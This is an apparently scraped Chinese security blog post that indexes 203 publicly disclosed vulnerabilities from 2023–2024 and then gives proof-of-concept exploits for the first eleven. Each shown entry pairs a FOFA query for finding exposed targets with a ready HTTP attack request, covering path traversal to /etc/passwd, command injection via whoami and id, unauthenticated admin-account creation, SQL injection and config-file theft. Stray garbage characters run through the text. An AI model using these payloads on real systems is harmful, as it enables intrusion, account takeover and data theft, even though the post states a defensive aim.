互联网公开漏洞整理202309-202406
p O+ j3 u0 _4 l) j道一安全 2024-06-05 07:41 北京+ Q ]3 M& q) L9 Z$ X7 w0 ]
以下文章来源于网络安全新视界 ,作者网络安全新视界( i0 S% A1 k$ l9 k* r
0 X. a9 K7 H r+ k( d9 G% x5 r N; ^发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
4 J2 F0 Q& ?' y% c! F% k( b; J. q" K- J$ o# k
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
- e# ]- E/ u' t( k
" o# v1 h) G- }- D, o; D9 q安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
2 q7 g1 w# h# {) y$ w" o& Y8 c$ f8 _' O
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。! A L- M9 D" C) d, T
/ B$ k+ i% F/ Z) u
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
# \' z+ Y1 @5 L ~" R9 X5 N
6 `0 G |0 r$ Y& Y- E- l( Y, a9 V) _- M3 m& w5 u
声明
7 x" j4 t$ l5 @2 M1 s$ c
, p" I3 M& T/ [" A为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。8 A& G! J& N: S# H) O4 `. P
/ j. p5 w$ a& G- F5 S
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
6 d# I' Z/ L0 z; R% f) h/ F: q: f: G8 G0 r4 A
, n$ W s8 b7 Z! D$ D) Q
: F- C6 h* ^; J, u目录3 }& P; H7 R. k
" E1 L" C. t, C/ U; Q
01 Y8 i" p: s h- o4 K
& W: n, T) E0 n& C
1. StarRocks MPP数据库未授权访问% O2 ~4 ] Q: O6 V( k
2. Casdoor系统static任意文件读取
6 A% n+ d& X+ p8 \* Z: o$ D3. EasyCVR智能边缘网关 userlist 信息泄漏/ e% {9 p' J* f6 T6 v, p
4. EasyCVR视频管理平台存在任意用户添加
- c7 C* j1 Z" k! _7 E- X6 W5. NUUO NVR 视频存储管理设备远程命令执行
" V, U) P6 q! M( _* {5 ~6. 深信服 NGAF 任意文件读取0 y9 r; D0 r1 e& }$ g7 j
7. 鸿运主动安全监控云平台任意文件下载) e2 M4 @- ?3 P+ d
8. 斐讯 Phicomm 路由器RCE/ X$ h! Q) Y3 N8 n8 p
9. 稻壳CMS keyword 未授权SQL注入6 T9 ^' R: Y; p- s
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传9 B# `. f8 k. ?% \$ [0 X
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入3 }9 c! [) m+ P( N
12. Jorani < 1.0.2 远程命令执行
/ W, ^2 _% L. G0 i' s% e13. 红帆iOffice ioFileDown任意文件读取
; O3 ^: Q5 Y# c& P& M14. 华夏ERP(jshERP)敏感信息泄露* p! @! ]( c/ R5 e8 g+ k
15. 华夏ERP getAllList信息泄露
- [$ N4 }7 V: K: j16. 红帆HFOffice医微云SQL注入8 E. J& D% m; A6 [: F ]' t
17. 大华 DSS itcBulletin SQL 注入
. x& m. ^/ A4 c( R# a0 R4 O( w18. 大华 DSS 数字监控系统 user_edit.action 信息泄露& O( ]- l2 p) u4 v) I, ]3 i
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入3 c1 F5 q7 G# E+ Q: s' Z, @
20. 大华ICC智能物联综合管理平台任意文件读取
: l6 L4 G, H, B% Z7 X [; d' Y21. 大华ICC智能物联综合管理平台random远程代码执行
' O4 [2 @3 a! o. z' \: V/ j22. 大华ICC智能物联综合管理平台 log4j远程代码执行
4 }4 A- L; x6 o% Z23. 大华ICC智能物联综合管理平台 fastjson远程代码执行$ [/ m) N/ I/ P$ C2 C; ]+ i! e, G! c: P
24. 用友NC 6.5 accept.jsp任意文件上传' y; a8 c! A6 ^. U
25. 用友NC registerServlet JNDI 远程代码执行+ K" B. p6 W" M- W9 P( v E
26. 用友NC linkVoucher SQL注入" J$ j" E5 ?9 h
27. 用友 NC showcontent SQL注入
8 L( s) v& N2 R1 {1 U9 H$ w28. 用友NC grouptemplet 任意文件上传$ y% @/ ~# C( G9 O$ h
29. 用友NC down/bill SQL注入+ p) O! Z: U$ ]; `! \& E+ I
30. 用友NC importPml SQL注入) s% H3 E8 t& r- @
31. 用友NC runStateServlet SQL注入, f9 N( Q/ ^" q8 q
32. 用友NC complainbilldetail SQL注入# @& B5 c7 L$ |( L8 \# y
33. 用友NC downTax/download SQL注入. J" \4 k+ B$ Y( k5 t! x
34. 用友NC warningDetailInfo接口SQL注入
! Q! m2 g2 T& S& a; N35. 用友NC-Cloud importhttpscer任意文件上传
+ }! k. N$ v9 a+ ? d36. 用友NC-Cloud soapFormat XXE
! l& V3 q& o, t9 E37. 用友NC-Cloud IUpdateService XXE
+ Z! j4 O# N& |: `. V& X38. 用友U8 Cloud smartweb2.RPC.d XXE
; `: d) s! f$ l* g5 p5 c% B' g39. 用友U8 Cloud RegisterServlet SQL注入9 i$ x# i0 B* o
40. 用友U8-Cloud XChangeServlet XXE
0 i, ^7 }5 u4 E1 l' @2 C7 @4 T41. 用友U8 Cloud MeasureQueryByToolAction SQL注入4 f1 w: e+ ]8 x2 O* j- P
42. 用友GRP-U8 SmartUpload01 文件上传& a7 J' {! p. _
43. 用友GRP-U8 userInfoWeb SQL注入致RCE; u( g$ c0 x: Q; F; h$ m. G
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
) T" d) J. V/ {7 o- A5 I45. 用友GRP-U8 ufgovbank XXE
" v; S2 L" i8 M7 |* m: j. P0 m1 k2 k46. 用友GRP-U8 sqcxIndex.jsp SQL注入$ L* R) E$ m4 ~; Y; x- ~
47. 用友GRP A++Cloud 政府财务云 任意文件读取
* v' G" d- @3 j: v9 x! f6 D48. 用友U8 CRM swfupload 任意文件上传9 C6 j$ h9 H* l i
49. 用友U8 CRM系统uploadfile.php接口任意文件上传% a1 \7 M' k% p4 r* P! i
50. QDocs Smart School 6.4.1 filterRecords SQL注入
+ b" b' s O# L0 L) Y51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入6 F5 z* [5 M; \' s2 u. G/ [
52. 泛微E-Office json_common.php sql注入$ |" D. p: T: l% }: J
53. 迪普 DPTech VPN Service 任意文件上传( I' q1 V. o) S
54. 畅捷通T+ getstorewarehousebystore 远程代码执行% n) c* \1 l2 H6 K# w: ?
55. 畅捷通T+ getdecallusers信息泄露
/ M- X" X! A$ F' I8 h: T9 b$ x56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE( B) s1 D0 v, A# ^7 ~4 P4 I' d: n
57. 畅捷通T+ keyEdit.aspx SQL注入
& l2 o& g, G% J9 V/ b% ^58. 畅捷通T+ KeyInfoList.aspx sql注入8 X6 @9 W8 [% d7 `
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
! B% }! k4 e$ q% d! P- e9 ~! ^60. 百卓Smart管理平台 importexport.php SQL注入% o; T$ m r9 S5 d
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
& H' Q) q8 A: u2 ~; Q62. IP-guard WebServer 远程命令执行! u k' ~" c: n& C
63. IP-guard WebServer任意文件读取
/ H3 \. r( x! \/ r- Q7 J& o/ E64. 捷诚管理信息系统CWSFinanceCommon SQL注入
2 s) {; W$ H" H: t* `/ A) {65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过& P# z& y; \+ F8 y$ A
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
% `; M! k- C" q, K5 h1 w67. 万户ezOFFICE wpsservlet任意文件上传5 k# j3 o+ u9 J: c. v3 i" |; o! O4 i" G
68. 万户ezOFFICE wf_printnum.jsp SQL注入
! P; O0 t8 k; a: r69. 万户 ezOFFICE contract_gd.jsp SQL注入9 F2 {/ C0 x2 k1 Z
70. 万户ezEIP success 命令执行- b. t9 u7 x% p. n' g. M C
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入' ?% b+ U2 C1 Q9 D2 x: _
72. 致远OA getAjaxDataServlet XXE( z6 h: f: y6 k& q
73. GeoServer wms远程代码执行
, h! ^3 E# q4 ?+ X74. 致远M3-server 6_1sp1 反序列化RCE3 i& A& ] u# h" t- V( {- F
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE6 C) Z8 G% |4 G& R
76. 新开普掌上校园服务管理平台service.action远程命令执行( l5 m. w; Z& R
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
0 m; ?0 m- R c4 t/ z78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传9 B. [4 F' T c
79. BYTEVALUE 百为流控路由器远程命令执行
5 S6 Q$ e$ n# `9 a) Y80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传9 @/ ~5 ]8 a& N: w z: j1 X
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
A4 a2 t) ?1 K" N82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行/ |& m( ] x! h' S |
83. JeecgBoot testConnection 远程命令执行" L M9 a) W0 ^0 Y. H) i
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入2 R. `! s5 ?6 C+ w! @. J2 S. d
85. SysAid On-premise< 23.3.36远程代码执行
% d, J% e a5 a2 r86. 日本tosei自助洗衣机RCE
. r6 A" D8 I( q$ S; k* v87. 安恒明御安全网关aaa_local_web_preview文件上传
5 }: K ?( O0 q3 `6 p88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行- B0 Z; N! L! E
89. 致远互联FE协作办公平台editflow_manager存在sql注入
. \0 r. [! r; O6 g90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行& y- y k1 x* E# ]
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
0 d6 |) M7 K6 o# `, M# g! n3 m4 _& c92. 海康威视运行管理中心session命令执行
$ o) h; M; Z M7 j93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
0 @7 v) ?. a, S, m! Y94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传$ E' n: B- c$ @' d; ?* X. i1 D
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
$ s4 S. j# P. X5 \96. Apache OFBiz 18.12.11 groovy 远程代码执行; y" H. t- {7 n/ p( u6 ~
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行; }7 q' {% E' F1 N a
98. SpiderFlow爬虫平台远程命令执行
5 @/ Z- F9 R, N+ M99. Ncast盈可视高清智能录播系统busiFacade RCE* [! R, C' u; }( T, P3 v
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传- R6 v5 ?. Z2 `
101. ivanti policy secure-22.6命令注入! B [' G: S- [3 Y9 M5 Y
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行; \ V. @7 W9 J& }
103. Ivanti Pulse Connect Secure VPN XXE
7 H* o: c# o4 U+ K* h4 c104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露* R$ k; h' Z. i# \" X
105. SpringBlade v3.2.0 export-user SQL 注入
# o1 `+ Q- `: u1 q+ S% g106. SpringBlade dict-biz/list SQL 注入1 i: P+ Y" \5 v6 g2 V4 @
107. SpringBlade tenant/list SQL 注入% D3 J# e2 o. K4 ]- i
108. D-Tale 3.9.0 SSRF8 `' O- `3 P2 S$ o- q' |1 H9 J
109. Jenkins CLI 任意文件读取! ]0 t, L( o$ k [ A
110. Goanywhere MFT 未授权创建管理员/ f$ _7 C4 ~# n' j1 d( t+ ?( B9 Z7 Q* y
111. WordPress Plugin HTML5 Video Player SQL注入
3 T3 D7 C: {' O% t112. WordPress Plugin NotificationX SQL 注入
" V5 n% S7 c7 m- h6 M113. WordPress Automatic 插件任意文件下载和SSRF
R( f2 H8 p- u% v9 `9 C114. WordPress MasterStudy LMS插件 SQL注入
6 A, h* ~$ ~$ H1 j+ g- {115. WordPress Bricks Builder <= 1.9.6 RCE
9 S2 ?1 O4 N g116. wordpress js-support-ticket文件上传$ ?9 }' r1 T1 c1 {2 o
117. WordPress LayerSlider插件SQL注入5 ?0 Y# [0 b8 I( ?% ^- y! c8 [
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
- i2 x% m* W3 b$ b119. 北京百绰智能S20后台sysmanageajax.php sql注入" |, {/ g; P' c0 }! ~' F6 R; U
120. 北京百绰智能S40管理平台导入web.php任意文件上传6 c9 @% C# m/ ?6 s2 ]
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
* O& _0 m% h/ A2 f/ E1 ~122. 北京百绰智能s200管理平台/importexport.php sql注入3 f# B. ?; `, k2 B
123. Atlassian Confluence 模板注入代码执行
; l) O& I( ~ t% V7 k+ w9 ~% F124. 湖南建研工程质量检测系统任意文件上传
' o o9 ?9 i% k! a- o125. ConnectWise ScreenConnect身份验证绕过
7 f9 g5 ^9 n# E126. Aiohttp 路径遍历. E2 R4 S) M; ~7 ~, D; Z7 G
127. 广联达Linkworks DataExchange.ashx XXE
! n! Z0 F* C' V9 N. F3 q: `3 ^# I) x128. Adobe ColdFusion 反序列化
4 d3 a$ _' q7 Z6 w/ J129. Adobe ColdFusion 任意文件读取
# t7 ]4 o% g4 h2 W% o4 S9 M( B5 d) E2 Z130. Laykefu客服系统任意文件上传6 H7 N( m6 h: J4 ?
131. Mini-Tmall <=20231017 SQL注入' r7 k( A4 R7 i( q/ n" N9 x, {8 R# l
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过9 f$ |' d* E" Y9 n9 x# ?7 Y3 j8 F3 z
133. H5 云商城 file.php 文件上传% T; D, [& D5 G! W
134. 网康NS-ASG应用安全网关index.php sql注入
0 D1 J1 a) F( t2 B- Y. @135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入& w" D7 |7 t' W3 z5 H
136. NextChat cors SSRF, }7 \* b. H: A( U2 J
137. 福建科立迅通信指挥调度平台down_file.php sql注入: E( e4 M: J- K- o# {1 t) K" {& C
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入4 [; ^7 h$ g1 {6 ~
139. 福建科立讯通信指挥调度平台editemedia.php sql注入 Q5 {2 A/ v( d' d$ N9 ^
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
9 `8 f( v( Y C! U4 W7 L141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
" u3 F5 {1 w4 k9 J' b. f142. CMSV6车辆监控平台系统中存在弱密码2 |4 r6 l7 b, \' y
143. Netis WF2780 v2.1.40144 远程命令执行- t" L3 W. ^# y. `7 h: Q
144. D-Link nas_sharing.cgi 命令注入0 _0 X8 }9 _2 E
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入4 @1 x- y8 v3 O
146. MajorDoMo thumb.php 未授权远程代码执行5 G1 d9 J5 z; u2 |$ B
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历% i& b: u% z a. U$ x' E3 ^9 z
148. CrushFTP 认证绕过模板注入
& c5 V6 O7 V. G$ P8 N$ `149. AJ-Report开源数据大屏存在远程命令执行
) I: M' Q$ y7 o: ^4 u6 K* ^6 M0 D# b' S150. AJ-Report 1.4.0 认证绕过与远程代码执行
0 z# G( ?# \8 o% g151. AJ-Report 1.4.1 pageList sql注入
1 \0 \2 m) h$ h1 [152. Progress Kemp LoadMaster 远程命令执行
$ F. \! W; X- z; l; l153. gradio任意文件读取0 m) s* C: c( P6 i% F: H
154. 天维尔消防救援作战调度平台 SQL注入* t A- r+ C! Z
155. 六零导航页 file.php 任意文件上传. c5 F0 v, G9 \' z8 x
156. TBK DVR-4104/DVR-4216 操作系统命令注入) ]# q( P, [+ V
157. 美特CRM upload.jsp 任意文件上传
% s( \% @$ N1 [, Z- V* F158. Mura-CMS-processAsyncObject存在SQL注入
/ D( [6 `- ~! ]1 Q1 m/ ~ }( [159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传- ~0 Z9 w! ]8 x4 t
160. Sonatype Nexus Repository 3目录遍历与文件读取
+ b5 p9 v; {7 Y) F7 b/ G161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传# k0 B( ?3 o* X
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
; y( N% e2 M3 K163. 号卡极团分销管理系统 ue_serve.php 任意文件上传3 z+ X' d; Z' g3 Y1 D9 L k* k: L
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传/ n* Q: b# V/ } \
165. OrangeHRM 3.3.3 SQL 注入* \7 X8 v# l: P! m: s
166. 中成科信票务管理平台SeatMapHandler SQL注入
% T: R( ]5 Y/ ?1 y8 q' G167. 精益价值管理系统 DownLoad.aspx任意文件读取4 r. ]" Z2 c- ~( Y. m7 g1 W3 R
168. 宏景EHR OutputCode 任意文件读取. }8 N+ y( H. ?* o
169. 宏景EHR downlawbase SQL注入
8 Z' ~: t$ `4 h( o/ T! U- M+ X170. 宏景EHR DisplayExcelCustomReport 任意文件读取
" u8 P, D+ G3 Z171. 通天星CMSV6车载定位监控平台 SQL注入7 l5 ^- w# A& F! x, U
172. DT-高清车牌识别摄像机任意文件读取& g, T( v6 |5 d5 `
173. Check Point 安全网关任意文件读取
: [1 y% I' H5 \# ~6 ~' B+ w- Y174. 金和OA C6 FileDownLoad.aspx 任意文件读取* Q0 k5 I2 ]7 M+ U! |
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入- w- c( [& P% C! ?* ~; @5 b) [
176. 电信网关配置管理系统 rewrite.php 文件上传! b- o3 c! h# P# v4 f
177. H3C路由器敏感信息泄露
7 S G2 X \5 b9 M178. H3C校园网自助服务系统-flexfileupload-任意文件上传% t& T- k$ d3 c
179. 建文工程管理系统存在任意文件读取
- S( I; k+ Y! |$ o180. 帮管客 CRM jiliyu SQL注入. k) Y1 Z( ?6 f; q9 a- k
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入1 |) F2 ~; J7 U/ @8 T m
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
: [5 `9 G ?, Y) l3 A+ L183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
: J! Q5 L- K7 X% z/ i! T7 c184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加 U2 P, E) [. e( Q* O
185. 瑞友天翼应用虚拟化系统SQL注入
6 K1 m" {6 r- A' H; w186. F-logic DataCube3 SQL注入
& U1 G/ {0 j! Q187. Mura CMS processAsyncObject SQL注入
6 {/ J8 W+ B+ r/ L2 f188. 叁体-佳会视频会议 attachment 任意文件读取
9 ?- J% `, t( p, Z; V% v( r189. 蓝网科技临床浏览系统 deleteStudy SQL注入
7 M" B8 S+ q$ d& k5 ~, \190. 短视频矩阵营销系统 poihuoqu 任意文件读取( Z+ w7 b6 \6 P$ w% e7 F, n
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
, _. [8 }3 v9 o& J8 H7 L192. 富通天下外贸ERP UploadEmailAttr 任意文件上传' R# n& l& G) ?
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
( F- k( q& h8 m0 V3 G/ _194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传+ ?% U6 V5 K3 s; g( s/ U8 }
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
, T0 T1 ?2 C& R1 F, D# M196. 河南省风速科技统一认证平台密码重置
6 ]. ?) n8 S. [! X197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入- ^& Z* W3 n* T3 z$ a/ x
198. 阿里云盘 WebDAV 命令注入
1 n; P9 P6 c: k- s) e, ]199. cockpit系统assetsmanager_upload接口 文件上传" _9 Z. `" R$ F8 ^
200. SeaCMS海洋影视管理系统dmku SQL注入
& `% o: b# P, v( m201. 方正全媒体新闻采编系统 binary SQL注入5 k5 H$ J Z: W5 R2 w/ M& s" C
202. 微擎系统 AccountEdit任意文件上传4 S1 F$ ]6 g2 ~3 V/ v- k0 V
203. 红海云EHR PtFjk 文件上传# b! T% \# A- O: U. O' ^
) S% p) m' J' T; c- y! T
POC列表
+ S" Z; L; o# \% x5 r- A; Q" q) B. z9 M7 P
02
& U1 n. b8 `7 [/ C
. l6 W3 r: |: {# C' P2 s* @9 i1. StarRocks MPP数据库未授权访问7 g" O/ W" B" S
FOFA :title="StarRocks"3 L( O W- C' y1 L6 z% G
GET /mem_tracker HTTP/1.1& k. W' v* }+ E6 C
Host: URL
, S1 E2 |1 B8 M$ L& @0 {0 U$ _; g8 z* Y$ y5 H2 \& W
6 q+ F8 _/ ]+ e4 Y+ W2. Casdoor系统static任意文件读取0 O% S6 T1 n9 R, r. Q) g
FOFA :title="Casdoor"( }" j4 t7 x" f0 y- \! J
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
: z6 {" _# z1 |# lHost: xx.xx.xx.xx:9999# p- ~0 @: D: A' K+ b% X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 w1 m b( q6 W5 h( ?Connection: close
( |9 a6 b5 K0 |/ @5 C4 L0 i! IAccept: */*. K: ^+ C. L* n& T8 \5 Y2 u
Accept-Language: en1 C, u6 K; h6 ], A6 k- r7 z
Accept-Encoding: gzip* z! r8 a! y8 ^6 y
+ z% K5 ?: p6 J5 H( P9 |8 P( L
* B% P* o$ A* J0 g1 c2 y( c2 {
3. EasyCVR智能边缘网关 userlist 信息泄漏. J3 p! ]6 A: x; B7 A# _
FOFA :title="EasyCVR"2 ~, i: L8 l$ W: J
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1; z& z0 r: A# N5 k1 Y
Host: xx.xx.xx.xx
9 u7 a U6 \) V( ^3 r- [
* N& }9 Z# r" X7 e6 C# l0 u' S* P7 G8 ^
4. EasyCVR视频管理平台存在任意用户添加, P9 j/ W4 J0 N# e- I- i2 @2 Q
FOFA :title="EasyCVR"
w) D/ k% t3 ~" i, Y
9 a( M* N: m4 i Jpassword更改为自己的密码md5) N: n4 ]4 P+ J' u9 u
POST /api/v1/adduser HTTP/1.13 v; D, F( e; x% o" C8 S* t+ D) K
Host: your-ip7 _# o6 m2 D, z5 V$ s
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
0 D; S3 G: G# n5 \, L7 v0 m! p* s7 y; j2 s
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=14 s/ D3 |% G# }0 x8 ~5 C
& f; Y/ D4 J0 K7 {9 Z. ~# a/ j
( ~1 Y- M6 K/ J2 K/ C, j! e: x5. NUUO NVR 视频存储管理设备远程命令执行
2 i8 R7 q; _% r6 MFOFA:title="Network Video Recorder Login"! ~, j9 R, ~8 }* G& m
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1# |0 A6 r$ J- J1 g/ C$ Z
Host: xx.xx.xx.xx
, ], X( X6 n1 F" r4 a0 N2 Z7 d: j) Y
$ E: ^2 C3 e: }) `8 A5 k, C0 D" l# ?
6. 深信服 NGAF 任意文件读取
& b; p9 y ] `; bFOFA:title="SANGFOR | NGAF"
1 Z' Y+ W! W! Q! s$ p8 OGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
% g* L3 V& } J [Host:
# d& T0 H& Q# i7 P- I( F8 I
7 @6 R. s! E! g0 V& ~% f( @7 v. j: @0 ~: d
7. 鸿运主动安全监控云平台任意文件下载2 q3 n+ e$ v& d6 X
FOFA:body="./open/webApi.html"
& U0 s; n& i- @. R: G0 D8 EGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
/ Y7 N; ~3 y& V4 T$ |8 e/ ]Host:
8 V$ ?2 U9 }, O2 h$ w+ ~
, ?, k- z3 k8 f. V
. k# o. x( F9 b: ?- }8. 斐讯 Phicomm 路由器RCE
' ~# I. X8 \% }FOFA:icon_hash="-1344736688"
( t1 E6 T0 Y7 }9 e默认账号admin登录后台后,执行操作: Y% N: c# C! y" {
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
( f+ K$ ]9 V7 \Host: x.x.x.x
( C0 i0 p( {; P" {0 u3 U. BCookie: sysauth=第一步登录获取的cookie
! _$ L1 V- w# J: uContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
; o) J9 {8 y# r- o$ pUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36$ u# s I- u, K9 W
6 {8 d% o2 G/ h6 T------WebKitFormBoundaryxbgjoytz( y0 K$ H. U; O1 Z& C3 q9 |4 f! z
Content-Disposition: form-data; name="wifiRebootEnablestatus"2 B) {, h2 n. D0 [: I& [ f0 I r
9 o2 s. B, C, `' B5 z* G7 {$ g2 J%s; w" N; O8 j, F
------WebKitFormBoundaryxbgjoytz: x e* O% ^3 q) D5 Q) K% Q a' i
Content-Disposition: form-data; name="wifiRebootrange"
. [: R6 b7 }2 Q# l7 y* d- v3 |" @! `- l4 H; h
12:00; id;$ d" O& K4 e4 s) d/ z: E$ K6 J
------WebKitFormBoundaryxbgjoytz
* {0 ]' b: }6 F; l, e# U( u% k2 Y$ |Content-Disposition: form-data; name="wifiRebootendrange"/ ?" w4 V- y* k) e
: `8 A5 E/ }; h# K7 ?& V%s:. M8 i0 d1 Q, [! Z9 u
------WebKitFormBoundaryxbgjoytz
) d) x) K9 ^0 W3 F" U7 v! EContent-Disposition: form-data; name="cururl2"
9 c7 ^1 ^8 \+ |3 U' M5 [- I! u* U2 X$ u1 O: J q
: h/ E; t6 _0 X- B0 ~------WebKitFormBoundaryxbgjoytz--* J7 u: A+ ~5 {; S; x# a9 _
1 n: U6 P* d2 @! V# I+ r! t/ n1 e" \
/ P8 `4 H( J3 |1 O9. 稻壳CMS keyword 未授权SQL注入- M2 o: A9 R8 d: Y3 e3 i
FOFA:app="Doccms"! V* |' E6 S/ g# d' v
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
" d. B" e$ ] ^* r& n/ Z- DHost: x.x.x.x& b: u. ]- ~6 P* Q
" L! U, }. u+ o- g8 H8 K; `
! F: Q i. B) C2 K2 D
payload为下列语句的二次Url编码/ W) E9 j8 P4 f; N1 M l D% O6 S) B5 o
/ u* k$ P$ B- O) t8 `1 }$ m: R' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#" j& E4 e8 I t# V# p% ~! g
2 H. |) ]- C* b10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
1 r' [/ t. c+ n' e# b$ \FOFA:icon_hash="953405444"
/ Z# o/ g5 Q; p( s' D
3 E. M; k7 G$ T' n' n! _7 O文件上传后响应中包含上传文件的路径
( C4 e/ G) v2 O* ^& m" W. {POST /eis/service/api.aspx?action=saveImg HTTP/1.1
2 e! ^) b$ n& r( m. C" CHost: x.x.x.x:xx
0 B6 y5 C) T9 O$ v. ~; K5 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
% ]2 a8 c- ~( y D- d3 C8 XContent-Length: 1972 ]0 l! u+ B! y; z+ M) x% s! I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
1 X7 S* H! K/ j/ w& @1 kAccept-Encoding: gzip, deflate
1 G9 y1 k; w) T: w$ X+ }) aAccept-Language: zh-CN,zh;q=0.9( o) c# \8 t6 `9 y
Connection: close
5 I7 i' N J# C. I! o7 V2 j9 dContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
+ U; h6 D( n0 h+ c; l) b! T& {: H5 c- x
------WebKitFormBoundaryxdgaqmqu0 K, }2 Z; ?& Y0 L: p
Content-Disposition: form-data; name="file"filename="icfitnya.txt"- q1 l3 n. e9 p. i% g
Content-Type: text/html
+ m) e, V7 [! J% a& i4 V" Q" @) }3 C: f |$ C; s
jmnqjfdsupxgfidopeixbgsxbf$ n4 F9 u2 B8 X2 i. ~) K9 p( @
------WebKitFormBoundaryxdgaqmqu--/ f u1 z3 y" q! z7 i3 t* q
% e7 R$ _: [' f4 V# ]
0 |, @# R, `3 ]" q11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
4 V; r w9 ~+ ?9 ^6 l& s/ }FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
) h7 }: _" p$ ^) i6 cGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1. T" ]& y4 n( E3 y% s6 y- K$ `
Host: 127.0.0.17 ^6 _6 W+ u2 z' X
Pragma: no-cache# ^2 c* X# z$ \4 n
